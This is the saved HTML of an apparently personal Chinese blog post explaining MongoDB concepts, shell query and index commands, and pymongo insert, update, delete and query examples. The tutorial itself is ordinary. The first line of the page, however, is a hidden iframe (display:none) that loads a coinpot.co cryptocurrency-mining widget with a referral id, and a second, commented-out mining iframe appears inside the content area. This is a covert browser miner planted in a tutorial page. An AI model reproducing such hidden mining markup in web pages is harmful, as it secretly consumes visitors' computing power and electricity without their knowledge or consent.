<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>

<!doctype html>














<html class="theme-next mist" lang="zh-Hans">
<head>
  <meta name="referrer" content="never">
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />
















<meta name="description" content="概念">
<meta name="keywords" content="Jekyll, NexT">
<meta property="og:type" content="article">
<meta property="og:title" content="mongo 概念">
<meta property="og:url" content="/blog/2019/04/17/mongo-base">
<meta property="og:site_name" content="Notes">
<meta property="og:description" content="概念">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79ly1g25u6yxv5vj31bc0iaaan.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79ly1g25ui32etaj31am0hy3zt.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79ly1g25v6k3nlsj312w0u0mz8.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79ly1g25zy2dq74j31ao0msjss.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79ly1g26m47yby1j311k0u0ad3.jpg">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="mongo 概念">
<meta name="twitter:description" content="概念">
<meta name="twitter:image" content="https://ws3.sinaimg.cn/large/006tNc79ly1g25u6yxv5vj31bc0iaaan.jpg">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: false,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href=""/>





  <title>mongo 概念 | Notes</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-120397256-1', 'auto');
  ga('send', 'pageview');
</script>













</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container sidebar-position-right page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-book">
          <a href="/book/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            库
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            <!--<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>-->


<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/blog/2019/04/17/mongo-base">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wyx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Notes">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">
          
          
            mongo 概念
          
        </h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-17T00:00:00+08:00">
                2019-04-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/mongo" itemprop="url" rel="index">
                    <span itemprop="name">mongo</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/blog/2019/04/17/mongo-base" class="leancloud_visitors" data-flag-title="mongo 概念">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <h1 id="概念">概念</h1>

<p><img src="https://ws3.sinaimg.cn/large/006tNc79ly1g25u6yxv5vj31bc0iaaan.jpg" alt="" /></p>

<p><img src="https://ws3.sinaimg.cn/large/006tNc79ly1g25ui32etaj31am0hy3zt.jpg" alt="" /></p>

<h1 id="集合">集合</h1>

<p>集合就是 MongoDB 文档组(<strong>类似于table</strong>) 集合存在于数据库中，集合没有固定的结构，通常情况下我们插入集合的数据都会有一定的关联性。</p>

<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3</pre></td><td class="code"><pre class="highlight"><code>{"site":"www.baidu.com"}
{"site":"www.google.com","name":"Google"}
{"site":"www.runoob.com","name":"菜鸟教程","num":5}
</code></pre></td></tr></tbody></table></div></div>

<h2 id="capped-collections">capped collections</h2>
<p>MongoDB 的操作日志文件</p>

<p><strong>固定大小</strong>的collection,按照<strong>插入顺序来保存</strong>（提高增添数据的效率）,必须要显式的创建一个capped collection，<strong>指定一个 collection 的大小</strong>，
单位是字节。collection 的数据存储空间值提前分配的。更新后的文档不可以超过之前文档的大小，这样话就可以确保所有文档在磁盘上的位置一直保持不变。</p>

<h1 id="元数据">元数据</h1>
<p>数据库的信息是存储在集合中。<code class="highlighter-rouge">dbname.system.*</code></p>

<h1 id="文档document">文档(Document)</h1>
<p>文档是一组键值 MongoDB 的文档不需要设置相同的字段，并且相同的字段不需要相同的数据类型</p>

<ul>
  <li>文档中的键/值对是有序的。</li>
  <li>文档中的值不仅可以是在双引号里面的字符串，还可以是其他几种数据类型（甚至可以是整个嵌入的文档)。</li>
  <li>MongoDB<strong>区分类型和大小写</strong>。</li>
  <li>MongoDB的文档<strong>不能有重复的键</strong>。</li>
  <li><strong>文档的键是字符串</strong>。除了少数例外情况，键可以使用任意UTF-8字符</li>
</ul>

<h1 id="数据类型">数据类型</h1>

<p><img src="https://ws4.sinaimg.cn/large/006tNc79ly1g25v6k3nlsj312w0u0mz8.jpg" alt="" /></p>

<p>ObjectId 类似唯一主键，可以很快的去生成和排序，MongoDB 中存储的<strong>文档必须有一个 _id 键</strong>。这个键的值<strong>可以是任何类型</strong>的，默认是个 ObjectId 对象</p>

<h1 id="连接">连接</h1>

<p><code class="highlighter-rouge">mongodb://username:password@hostname/dbname</code></p>

<h1 id="操作">操作</h1>

<h2 id="database">database</h2>

<p>数据库不存在，则创建数据库，否则切换到指定数据库
<code class="highlighter-rouge">use DATABASE_NAME</code></p>

<p>查看所有数据库
<code class="highlighter-rouge">show dbs</code></p>

<p>删除数据库
<code class="highlighter-rouge">db.dropDatabase()</code></p>

<h2 id="集合-1">集合</h2>

<p>删除
<code class="highlighter-rouge">db.[collection].drop()</code></p>

<p>查看所有集合
<code class="highlighter-rouge">show tables / show collections</code></p>

<p>建立
<code class="highlighter-rouge">db.createCollection(name, options)</code>
<img src="https://ws1.sinaimg.cn/large/006tNc79ly1g25zy2dq74j31ao0msjss.jpg" alt="" /></p>

<h1 id="select">select</h1>

<h2 id="条件比较">条件比较</h2>

<table>
  <thead>
    <tr>
      <th>操作</th>
      <th>格式</th>
      <th>范例</th>
      <th>RDBMS中的类似语句</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>等于</td>
      <td><code class="highlighter-rouge">{&lt;key&gt;:&lt;value&gt;}</code></td>
      <td>db.col.find({“by”:”菜鸟教程”}).pretty()</td>
      <td>where by = ‘菜鸟教程’</td>
    </tr>
    <tr>
      <td>小于</td>
      <td><code class="highlighter-rouge">{&lt;key&gt;:{$lt:&lt;value&gt;}}</code></td>
      <td>db.col.find({“likes”:{$lt:50}}).pretty()</td>
      <td>where likes &lt; 50</td>
    </tr>
    <tr>
      <td>小于或等于</td>
      <td><code class="highlighter-rouge">{&lt;key&gt;:{$lte:&lt;value&gt;}}</code></td>
      <td>db.col.find({“likes”:{$lte:50}}).pretty()</td>
      <td>where likes &lt;= 50</td>
    </tr>
    <tr>
      <td>大于</td>
      <td><code class="highlighter-rouge">{&lt;key&gt;:{$gt:&lt;value&gt;}}</code></td>
      <td>db.col.find({“likes”:{$gt:50}}).pretty()</td>
      <td>where likes &gt; 50</td>
    </tr>
  </tbody>
</table>

<h2 id="and">and</h2>

<p>每个键(key)以逗号隔开，即常规 SQL 的 AND 条件。</p>

<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>db.col.find({key1:value1, key2:value2}).pretty()
</code></pre></td></tr></tbody></table></div></div>

<p>50&lt;qty&lt;80</p>
<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>db.posts.find( {  qty: { $gt: 50 ,$lt: 80}} )
</code></pre></td></tr></tbody></table></div></div>

<h2 id="or">or</h2>

<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7</pre></td><td class="code"><pre class="highlight"><code>&gt;db.col.find(
   {
      $or: [
         {key1: value1}, {key2:value2}
      ]
   }
).pretty()
</code></pre></td></tr></tbody></table></div></div>

<h2 id="模糊">模糊</h2>

<p>查询 title 包含”教”字的文档：
<code class="highlighter-rouge">db.col.find({title:/教/})</code></p>

<p>查询 title 字段以”教”字开头的文档：
<code class="highlighter-rouge">db.col.find({title:/^教/})</code></p>

<p>查询 titl e字段以”教”字结尾的文档：
<code class="highlighter-rouge">db.col.find({title:/教$/})</code></p>

<h1 id="索引">索引</h1>

<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>db.collection.createIndex(keys, options)
</code></pre></td></tr></tbody></table></div></div>

<p>1 为指定按升序创建索引，如果你想按降序来创建索引指定为 -1</p>

<div class="highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>db.col.createIndex({"title":1,"description":-1})
</code></pre></td></tr></tbody></table></div></div>

<p><img src="https://ws4.sinaimg.cn/large/006tNc79ly1g26m47yby1j311k0u0ad3.jpg" alt="" /></p>

<p>查看集合索引
<code class="highlighter-rouge">db.col.getIndexes()</code></p>

<p>查看集合索引大小
<code class="highlighter-rouge">db.col.totalIndexSize()</code></p>

<p>删除集合所有索引
<code class="highlighter-rouge">db.col.dropIndexes()</code></p>

<p>删除集合指定索引
<code class="highlighter-rouge">db.col.dropIndex("索引名称")</code></p>

<h1 id="pymongo">pymongo</h1>

<h2 id="connect">connect</h2>
<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13</pre></td><td class="code"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pymongo</span>
<span class="kn">from</span> <span class="nn">bson</span> <span class="kn">import</span> <span class="n">ObjectId</span><span class="p">,</span> <span class="n">SON</span>

<span class="n">mongo_config</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'host'</span><span class="p">:</span> <span class="s">'localhost'</span><span class="p">,</span>
    <span class="s">'port'</span><span class="p">:</span> <span class="mi">27017</span><span class="p">,</span>
<span class="p">}</span>

<span class="n">db</span> <span class="o">=</span> <span class="n">pymongo</span><span class="o">.</span><span class="n">MongoClient</span><span class="p">(</span><span class="o">**</span><span class="n">mongo_config</span><span class="p">)</span>
<span class="c"># dblist = client.list_database_names()</span>
<span class="c"># print(dblist)</span>
<span class="n">site</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">my</span><span class="o">.</span><span class="n">site</span>
<span class="n">inventory</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">my</span><span class="o">.</span><span class="n">inventory</span>
</code></pre></td></tr></tbody></table></div></div>

<h2 id="insert">insert</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13</pre></td><td class="code"><pre class="highlight"><code><span class="n">d</span> <span class="o">=</span> <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"RUNOOB"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"10000"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.runoob.com"</span><span class="p">}</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">site</span><span class="o">.</span><span class="n">insert_one</span><span class="p">(</span><span class="n">d</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="o">.</span><span class="n">inserted_id</span><span class="p">)</span>

<span class="n">data_list</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"Taobao"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"100"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.taobao.com"</span><span class="p">},</span>
    <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"QQ"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"101"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.qq.com"</span><span class="p">},</span>
    <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"Facebook"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"10"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.facebook.com"</span><span class="p">},</span>
    <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"知乎"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"103"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.zhihu.com"</span><span class="p">},</span>
    <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"Github"</span><span class="p">,</span> <span class="s">"alexa"</span><span class="p">:</span> <span class="s">"109"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.github.com"</span><span class="p">}</span>
<span class="p">]</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">site</span><span class="o">.</span><span class="n">insert_many</span><span class="p">(</span><span class="n">data_list</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="o">.</span><span class="n">inserted_ids</span><span class="p">)</span>
</code></pre></td></tr></tbody></table></div></div>
<h2 id="update">update</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10</pre></td><td class="code"><pre class="highlight"><code><span class="n">query</span> <span class="o">=</span> <span class="p">{</span><span class="s">'alexa'</span><span class="p">:</span> <span class="s">'10880'</span><span class="p">}</span>
<span class="n">value</span> <span class="o">=</span> <span class="p">{</span><span class="s">"$set"</span><span class="p">:</span> <span class="p">{</span><span class="s">"alexa"</span><span class="p">:</span> <span class="s">"12345"</span><span class="p">}}</span>
<span class="n">value</span> <span class="o">=</span> <span class="p">{</span><span class="s">'$inc'</span><span class="p">:</span> <span class="p">{</span><span class="s">'age'</span><span class="p">:</span> <span class="mi">3</span><span class="p">}}</span>
<span class="n">unvalue</span> <span class="o">=</span> <span class="p">{</span><span class="s">"$unset"</span><span class="p">:</span> <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"12345"</span><span class="p">}}</span>
<span class="c"># res = db.update_one(query,value)</span>
<span class="c"># res = db.update_many(query, value, upsert=True)</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">site</span><span class="o">.</span><span class="n">update_one</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">unvalue</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span>
<span class="n">site</span><span class="o">.</span><span class="n">replace_one</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb735b4efdf11198ebb92ac'</span><span class="p">)},</span>
                 <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="s">"Taobao12323"</span><span class="p">,</span> <span class="s">"url"</span><span class="p">:</span> <span class="s">"https://www.taobao.com"</span><span class="p">},</span> <span class="p">)</span>
</code></pre></td></tr></tbody></table></div></div>

<h2 id="delete">delete</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2</pre></td><td class="code"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2</pre></td><td class="code"><pre class="highlight"><code><span class="n">site</span><span class="o">.</span><span class="n">delete_one</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb73399efdf11190e096729'</span><span class="p">)})</span>
<span class="n">site</span><span class="o">.</span><span class="n">delete_many</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb73399efdf11190e096729'</span><span class="p">)})</span>
</code></pre></td></tr></tbody></table></td></tr></tbody></table></div></div>
<h2 id="bulk">bulk</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2</pre></td><td class="code"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2</pre></td><td class="code"><pre class="highlight"><code><span class="n">site</span><span class="o">.</span><span class="n">delete_one</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb73399efdf11190e096729'</span><span class="p">)})</span>
<span class="n">site</span><span class="o">.</span><span class="n">delete_many</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb73399efdf11190e096729'</span><span class="p">)})</span>
</code></pre></td></tr></tbody></table></td></tr></tbody></table></div></div>

<h2 id="select-1">select</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15<br/>16<br/>17<br/>18<br/>19<br/>20<br/>21<br/>22<br/>23<br/>24<br/>25<br/>26<br/>27<br/>28<br/>29<br/>30<br/>31<br/>32<br/>33<br/>34<br/>35<br/>36<br/>37<br/>38<br/>39<br/>40<br/>41<br/>42<br/>43<br/>44<br/>45<br/>46<br/>47<br/>48<br/>49<br/>50<br/>51<br/>52<br/>53<br/>54<br/>55<br/>56<br/>57<br/>58<br/>59<br/>60<br/>61<br/>62<br/>63<br/>64<br/>65<br/>66<br/>67<br/>68<br/>69<br/>70<br/>71<br/>72<br/>73<br/>74<br/>75<br/>76<br/>77<br/>78<br/>79<br/>80<br/>81<br/>82<br/>83<br/>84<br/>85<br/>86<br/>87<br/>88<br/>89<br/>90<br/>91<br/>92<br/>93<br/>94</pre></td><td class="code"><pre class="highlight"><code><span class="c"># 查询  文档中的第一条数据</span>
<span class="k">print</span><span class="p">(</span><span class="n">site</span><span class="o">.</span><span class="n">find_one</span><span class="p">())</span>

<span class="c"># 查询集合中所有数据</span>
<span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">site</span><span class="o">.</span><span class="n">find</span><span class="p">():</span>
    <span class="k">print</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>

<span class="c"># where</span>
<span class="n">output</span><span class="p">(</span><span class="n">site</span><span class="o">.</span><span class="n">find_one</span><span class="p">({</span><span class="s">'_id'</span><span class="p">:</span> <span class="n">ObjectId</span><span class="p">(</span><span class="s">'5cb73399efdf11190e096721'</span><span class="p">)}))</span>

<span class="c"># 嵌入doc</span>
<span class="n">cursor</span> <span class="o">=</span> <span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">(</span>
    <span class="p">{</span><span class="s">"size"</span><span class="p">:</span> <span class="n">SON</span><span class="p">(</span>
        <span class="p">[(</span><span class="s">"h"</span><span class="p">,</span> <span class="mi">14</span><span class="p">),</span> <span class="p">(</span><span class="s">"w"</span><span class="p">,</span> <span class="mi">21</span><span class="p">),</span> <span class="p">(</span><span class="s">"uom"</span><span class="p">,</span> <span class="s">"cm"</span><span class="p">)]</span>
    <span class="p">)}</span>
<span class="p">)</span>

<span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"size.uom"</span><span class="p">:</span> <span class="s">"in"</span><span class="p">})</span>

<span class="c"># and</span>
<span class="n">output</span><span class="p">(</span><span class="n">site</span><span class="o">.</span><span class="n">find_one</span><span class="p">({</span><span class="s">'name'</span><span class="p">:</span> <span class="s">'RUNOOB'</span><span class="p">,</span> <span class="s">'alexa'</span><span class="p">:</span> <span class="s">'100003'</span><span class="p">,</span> <span class="p">}))</span>

<span class="n">query</span> <span class="o">=</span> <span class="p">{</span><span class="s">"name"</span><span class="p">:</span> <span class="p">{</span><span class="s">"$lt"</span><span class="p">:</span> <span class="s">"H"</span><span class="p">}}</span>
<span class="n">mydoc</span> <span class="o">=</span> <span class="n">site</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">query</span><span class="p">)</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">mydoc</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

<span class="c"># 字段限制 or select xx .limit(1).skip(2) =&gt; limit(2,1)</span>
<span class="n">query</span> <span class="o">=</span> <span class="p">{</span><span class="s">"$or"</span><span class="p">:</span> <span class="p">[{</span><span class="s">'alexa'</span><span class="p">:</span> <span class="s">'101'</span><span class="p">},</span> <span class="p">{</span><span class="s">'alexa'</span><span class="p">:</span> <span class="s">'12345'</span><span class="p">}]}</span>
<span class="n">output</span><span class="p">(</span><span class="n">site</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="p">{</span><span class="s">'_id'</span><span class="p">:</span> <span class="mi">0</span><span class="p">})</span><span class="o">.</span><span class="n">limit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">.</span><span class="n">skip</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span>

<span class="c"># order by  1 为升序排列，而 -1 是用于降序排列。</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">site</span><span class="o">.</span><span class="n">find</span><span class="p">()</span><span class="o">.</span><span class="n">sort</span><span class="p">([</span>
    <span class="p">(</span><span class="s">'alexa'</span><span class="p">,</span> <span class="n">pymongo</span><span class="o">.</span><span class="n">DESCENDING</span><span class="p">),</span> <span class="p">(</span><span class="s">'name'</span><span class="p">,</span> <span class="n">pymongo</span><span class="o">.</span><span class="n">ASCENDING</span><span class="p">)</span>
<span class="p">]):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
<span class="c"># in</span>
<span class="n">query</span> <span class="o">=</span> <span class="p">{</span><span class="s">'name'</span><span class="p">:</span> <span class="p">{</span><span class="s">'$in'</span><span class="p">:</span> <span class="p">[</span><span class="s">'Facebook'</span><span class="p">,</span> <span class="s">'Taobao'</span><span class="p">]}}</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">site</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">query</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

<span class="c"># array</span>

<span class="c"># 严格 有 顺序一样</span>
<span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"tags"</span><span class="p">:</span> <span class="p">[</span><span class="s">"red"</span><span class="p">,</span> <span class="s">"blank"</span><span class="p">]})</span>
<span class="c"># 包含这两个元素 不考虑数组中的顺序或其他元素</span>
<span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"tags"</span><span class="p">:</span> <span class="p">{</span><span class="s">"$all"</span><span class="p">:</span> <span class="p">[</span><span class="s">"red"</span><span class="p">,</span> <span class="s">"blank"</span><span class="p">]}})</span>
<span class="c"># 包含</span>
<span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"tags"</span><span class="p">:</span> <span class="s">"red"</span><span class="p">})</span>
<span class="c"># 数组位置2</span>
<span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"dim_cm.1"</span><span class="p">:</span> <span class="p">{</span><span class="s">"$gt"</span><span class="p">:</span> <span class="mi">25</span><span class="p">}})</span>
<span class="c"># 长度</span>
<span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"tags"</span><span class="p">:</span> <span class="p">{</span><span class="s">"$size"</span><span class="p">:</span> <span class="mi">3</span><span class="p">}})</span>

<span class="c"># 数组嵌入</span>
<span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">'instock.0.qty'</span><span class="p">:</span> <span class="p">{</span><span class="s">"$lte"</span><span class="p">:</span> <span class="mi">20</span><span class="p">}})</span>
